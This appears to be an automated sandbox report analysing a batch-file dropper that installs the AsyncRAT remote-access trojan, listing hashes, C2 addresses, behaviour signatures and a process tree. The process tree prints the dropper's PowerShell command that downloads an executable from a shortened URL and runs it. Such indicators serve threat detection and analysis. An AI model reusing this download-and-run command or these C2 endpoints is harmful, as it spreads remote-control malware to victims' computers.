Analysis

  • max time kernel
    146s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/10/2024, 23:30

General

  • Target

    file-ly5.bat

  • Size

    604B

  • MD5

    a382e3f085e005edb9c5ea215109bb9b

  • SHA1

    e7454672385b823bd0e26eaaf092aa9f04607429

  • SHA256

    5b60f3dc0e0e96085cdddb8d8135eede32ccc9f0981996261a8cf27d4be2dbfb

  • SHA512

    bee9a075e2acb3c47c24590e0b98a0949d5b7d6a86f017b0290304413bbac3b25e89ea8549a0be4fdfb88604ce6d950a151b3cd3370b71aefa9fbce3273a87ee

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://u.to/nBL7IA

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:43655

excellent-waiver.gl.at.ply.gg:43655

tcp://gg123213123sadas-38622.portmap.host:43655

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\file-ly5.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://u.to/nBL7IA', 'file.exe')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4948
    • C:\Users\Admin\AppData\Local\Temp\file.exe
      "file.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2964
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:632
    • C:\Windows\system32\PING.EXE
      ping localhost -n 3
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:1948
    • C:\Windows\system32\PING.EXE
      ping localhost -n 3
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:2792

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.exe

          Filesize

          63KB

          MD5

          29b38d4c415d9b464f1ff073e0a43913

          SHA1

          ddf87b649f725c62ebd42914c71b2e446f1aeddf

          SHA256

          6fd7acee70eef7574951bc9def49e41c2fde7aea50141672dcb1b2c79f510549

          SHA512

          3f5801764e4c124c3b5cea11ddc3a79eb5cf37cb1bc50059ba2f9010200e717b36c726409595a1064dcf364eeb77fd801d8ef6ca73546a498e0dff5d9e668897

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tnaa1tal.yff.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\file.exe

          Filesize

          465KB

          MD5

          d435bd69c788f8f42a73158ea2526716

          SHA1

          dc640272ce6c4a1bf8487ab917fd175b034de7aa

          SHA256

          98208142a545c388e0fc0efcf8a6b203673412c0510ab330c47337fa74bb4dc2

          SHA512

          729200f3d1e30f90f81defb6e392a90d54509fdf55238971e7ba1df2663fb9f042490a8329bad5c02a8768e956d41d1180049414802f08a6974b35f03d953b62

        • memory/632-32-0x0000000000A90000-0x0000000000AA6000-memory.dmp

          Filesize

          88KB

        • memory/4948-0-0x00007FFE394C3000-0x00007FFE394C5000-memory.dmp

          Filesize

          8KB

        • memory/4948-1-0x00000180552A0000-0x00000180552C2000-memory.dmp

          Filesize

          136KB

        • memory/4948-11-0x00007FFE394C0000-0x00007FFE39F81000-memory.dmp

          Filesize

          10.8MB

        • memory/4948-12-0x00007FFE394C0000-0x00007FFE39F81000-memory.dmp

          Filesize

          10.8MB

        • memory/4948-16-0x00007FFE394C0000-0x00007FFE39F81000-memory.dmp

          Filesize

          10.8MB